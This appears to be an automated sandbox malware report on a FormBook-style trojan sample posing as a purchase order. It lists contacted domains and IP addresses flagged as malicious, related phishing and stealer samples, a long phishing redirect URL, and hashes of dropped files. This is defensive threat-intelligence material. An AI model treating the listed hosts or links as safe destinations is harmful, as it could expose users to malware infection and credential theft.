                                                                            https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121445018007.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://ac.ecosia.org/autocomplete?q=AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/search.pngAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111752281448.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/amazeui.cssBLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.pngAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111820293498.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.pngAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand=AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.reg.ru/sozdanie-saita/AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://github.com/twbs/bootstrap/blob/master/LICENSE)AtBroker.exe, 00000003.00000002.3526286582.0000000005F48000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000004678000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/normalize.cssAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121103162503.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.reg.ru/hosting/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land_hAtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281610030481.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281832298961.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111319395468.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121111152889.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/app.cssAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/mescroll.min.cssAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121124551331.jpgAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/buy-logo.pngAtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      172.217.16.211
                                                                                      ghs.google.comUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      67.223.117.142
                                                                                      www.flikka.siteUnited States
                                                                                      15189VIMRO-AS15189UStrue
                                                                                      38.47.237.27
                                                                                      iuyi542.xyzUnited States
                                                                                      174COGENT-174UStrue
                                                                                      38.88.82.56
                                                                                      www.college-help.infoUnited States
                                                                                      174COGENT-174USfalse
                                                                                      104.21.14.183
                                                                                      www.yvrkp.topUnited States
                                                                                      13335CLOUDFLARENETUStrue
                                                                                      206.119.81.36
                                                                                      neg21.topUnited States
                                                                                      174COGENT-174UStrue
                                                                                      194.58.112.174
                                                                                      www.marketplacer.topRussian Federation
                                                                                      197695AS-REGRUtrue
                                                                                      3.33.130.190
                                                                                      binacamasala.comUnited States
                                                                                      8987AMAZONEXPANSIONGBfalse
                                                                                      47.129.103.185
                                                                                      www.kghjkx.xyzCanada
                                                                                      34533ESAMARA-ASRUtrue
                                                                                      113.20.119.31
                                                                                      dns.webcake.ioViet Nam
                                                                                      45903CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVNfalse
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1554972
                                                                                      Start date and time:2024-11-13 09:25:22 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 9m 29s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Run name:Run with higher sleep bypass
                                                                                      Number of analysed new started processes analysed:8
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:2
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:PO AT-5228.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/5@14/10
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 75%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 97%
                                                                                      • Number of executed functions: 62
                                                                                      • Number of non-executed functions: 291
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Execution Graph export aborted for target BLUymyzgBTyhbo.exe, PID 5856 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      No simulations
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      67.223.117.142shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.flikka.site/brrb/
                                                                                      New PO [FK4-7173].pdf.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.maviro.xyz/hcih/
                                                                                      SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.flikka.site/brrb/
                                                                                      proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.jorbaq.top/saaz/
                                                                                      DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.plyvik.info/ak8m/
                                                                                      SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.plyvik.info/yhso/
                                                                                      INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.plyvik.info/ak8m/
                                                                                      38.47.237.27shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.iuyi542.xyz/cymd/
                                                                                      SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.iuyi542.xyz/cymd/
                                                                                      38.88.82.56shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.college-help.info/fu91/
                                                                                      SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.college-help.info/fu91/
                                                                                      SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.college-help.info/wm94/
                                                                                      NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.college-help.info/lk0h/
                                                                                      18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.college-help.info/lk0h/
                                                                                      WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • www.college-help.info/ah9r/
                                                                                      PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                      • www.college-help.info/lk0h/
                                                                                      104.21.14.183shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.yvrkp.top/9jdk/
                                                                                      SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.yvrkp.top/9jdk/
                                                                                      206.119.81.36shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.neg21.top/1i1f/
                                                                                      SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.neg21.top/1i1f/
                                                                                      proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.neg21.top/w6i7/
                                                                                      request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                      • www.neg21.top/e18l/
                                                                                      NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                                                      • www.neg21.top/e18l/
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      www.college-help.infoshipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                      • 38.88.82.56
                                                                                      SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                      • 38.88.82.56
                                                                                      SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                      • 38.88.82.56
                                                                                      NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                      • 38.88.82.56
                                                                                      18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                      • 38.88.82.56
                                                                                      WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • 38.88.82.56
                                                                                      PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                      • 38.88.82.56
                                                                                      www.kghjkx.xyzshipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                      • 47.129.103.185
                                                                                      SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                      • 47.129.103.185
                                                                                      dns.webcake.ioshipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                      • 113.20.119.31
                                                                                      SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                      • 113.20.119.31
                                                                                      https://pagina.pro/Iraq2024ewGet hashmaliciousUnknownBrowse
                                                                                      • 203.205.10.134
                                                                                      http://www.open-sora.orgGet hashmaliciousExela Stealer, Growtopia, Python StealerBrowse
                                                                                      • 203.205.10.134
                                                                                      Versanddetails.exeGet hashmaliciousFormBookBrowse
                                                                                      • 113.20.119.61
                                                                                      Versanddetails.exeGet hashmaliciousFormBookBrowse
                                                                                      • 113.20.119.61
                                                                                      pagamento.exeGet hashmaliciousFormBookBrowse
                                                                                      • 113.20.119.61
                                                                                      Original Shipment Document.exeGet hashmaliciousFormBookBrowse
                                                                                      • 113.20.119.61
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      CLOUDFLARENETUSLoader.exeGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.97.3
                                                                                      http://t.nypost.com/1/e/r?aqet=clk&r=2&ca=26510028&v0=aftua%40gmail.com&ru=//www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%SERIAL%25wDnNeW8yycT&sa=t&esrc=nNeW8F%SERIAL%25A0xys8Em2FL&source=&cd=tS6T8%SERIAL%25Tiw9XH&cad=XpPkDfJX%SERIAL%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%62%79%64%61%2E%6E%67%2F%63%69%67%2E%62%69%6E%2F%67%67%6C%6E%46%78%50%51%30%47%76%38%64%43%45%35%45%43%61%37%66%37%78%63%58%71%32%79%74%4D%57%65%54%6E%31%37%53%74%68%66%4C%56%74%52%44%70%4E%58%36%63%6B%42%66%50%7A%42%38%6B%51%52%36%38%64%67%53%64%31%4C%6C%73%33%71%37%76%6E%79%6E%48%6D%75%41%73%31%2F%23Y2hyaXN0b3BoZXIuZG9sYW5AdmlyZ2lubW9uZXkuY29tGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                      • 104.17.25.14
                                                                                      setup7.0.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                      • 104.26.13.205
                                                                                      blhbZrtqbLg6O1K.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.96.3
                                                                                      Updatev4_5.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.80.55
                                                                                      Payment Copy.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.96.3
                                                                                      TT copy.exeGet hashmaliciousFormBookBrowse
                                                                                      • 188.114.97.3
                                                                                      2 Payment Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.96.3
                                                                                      QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 188.114.96.3
                                                                                      DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 172.67.74.152
                                                                                      VIMRO-AS15189USshipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                      • 67.223.117.142
                                                                                      fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                                      • 67.223.118.17
                                                                                      New PO [FK4-7173].pdf.exeGet hashmaliciousFormBookBrowse
                                                                                      • 67.223.117.142
                                                                                      SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                      • 67.223.117.142
                                                                                      proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                      • 67.223.117.142
                                                                                      DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                                      • 67.223.117.142
                                                                                      icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                      • 67.223.118.17
                                                                                      SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                      • 67.223.117.142
                                                                                      INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                      • 67.223.117.142
                                                                                      QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                                      • 67.223.117.169
                                                                                      COGENT-174USyakuza.i586.elfGet hashmaliciousUnknownBrowse
                                                                                      • 154.18.45.166
                                                                                      yakuza.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                      • 38.251.108.229
                                                                                      meerkat.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                      • 206.235.235.131
                                                                                      meerkat.spc.elfGet hashmaliciousMiraiBrowse
                                                                                      • 204.45.214.204
                                                                                      meerkat.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                      • 38.6.229.100
                                                                                      Confirming - Notice of payment_SWIFT BJ23004300IU.bat.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.23.243.75
                                                                                      FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                                                      • 38.47.232.202
                                                                                      wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                                                      • 206.119.82.134
                                                                                      Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.38.64.6
                                                                                      inter.exeGet hashmaliciousUnknownBrowse
                                                                                      • 154.23.181.145
                                                                                      COGENT-174USyakuza.i586.elfGet hashmaliciousUnknownBrowse
                                                                                      • 154.18.45.166
                                                                                      yakuza.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                      • 38.251.108.229
                                                                                      meerkat.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                      • 206.235.235.131
                                                                                      meerkat.spc.elfGet hashmaliciousMiraiBrowse
                                                                                      • 204.45.214.204
                                                                                      meerkat.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                      • 38.6.229.100
                                                                                      Confirming - Notice of payment_SWIFT BJ23004300IU.bat.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.23.243.75
                                                                                      FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                                                      • 38.47.232.202
                                                                                      wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                                                      • 206.119.82.134
                                                                                      Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.38.64.6
                                                                                      inter.exeGet hashmaliciousUnknownBrowse
                                                                                      • 154.23.181.145
                                                                                      No context
                                                                                      No context
                                                                                      Process:C:\Windows\SysWOW64\AtBroker.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\PO AT-5228.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):288768
                                                                                      Entropy (8bit):7.994352075567934
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:q5buJtERmLfypQeAtoEmCTqLuXqPfKHZMtoPTW0Dpp9FES+gKVTFzPvR:q1usmLfah6IaXqPC5ooL5xFES+1JzXR
                                                                                      MD5:F5CDF90E36117F3EB7CC8804601A14A9
                                                                                      SHA1:930E6331C675AD4302B3E3FA06C470CD26AE538B
                                                                                      SHA-256:87675C6C3DAED3AC5196B0BFDE77C67D323EC023767F6EAB90AE01B4A9F5807B
                                                                                      SHA-512:E38945C874FAF90E193F01838FDA5DA56D4ADE8C7ADD97A78DA002880EE27DC1CA48B81F7624145E00E14A4DA8DD5391F31BDA14C9FDEEFF90FA1DB441885D1D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:t....GIHO...^....d.YD..q4\...9OXMYGIHOY7TWA59OXMYGIHOY7TWA5.OXMWX.FO.>.v.4u.y.1.:h?+X3% X.,9#7(=h-<.&"/.P!x...i% =RzZL?.OXMYGIH6X>.j!R.r8*.z)/.C...{U^.B..u((.-....Y(..0$!u/>.TWA59OXM..IH.X6T..scOXMYGIHO.7VVJ42OX.]GIHOY7TWA.-OXMIGIH?]7TW.59_XMYEIHIY7TWA59IXMYGIHOYGPWA79OXMYGKH..7TGA5)OXMYWIH_Y7TWA5)OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7Ty5PA;XMY..LOY'TWAc=OX]YGIHOY7TWA59OXmYG)HOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY
                                                                                      Process:C:\Users\user\Desktop\PO AT-5228.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):14542
                                                                                      Entropy (8bit):7.63326193728937
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:nTYznwwovyyyY0lYRgtA+lQs3wN6Ue4ncEoVJSRgIn:nAwwo0RptZl33wN6nCGMaq
                                                                                      MD5:525B414835ED1A137CA0E4205780E495
                                                                                      SHA1:CBC054B76E9851AB9398363CEEEC830DCEB4C147
                                                                                      SHA-256:3791561C7BF97A86F9115E50127789A5FCF973D45609638984A002542B01F3AC
                                                                                      SHA-512:7F21A085998E6F02F3F7FD397989C0A24C13C6A302D49F6D1D5DE392573DF8A8823999E90BAD581B022DC05870B0D8E0C3161E21F61F99F5E3201168430B6225
                                                                                      Malicious:false
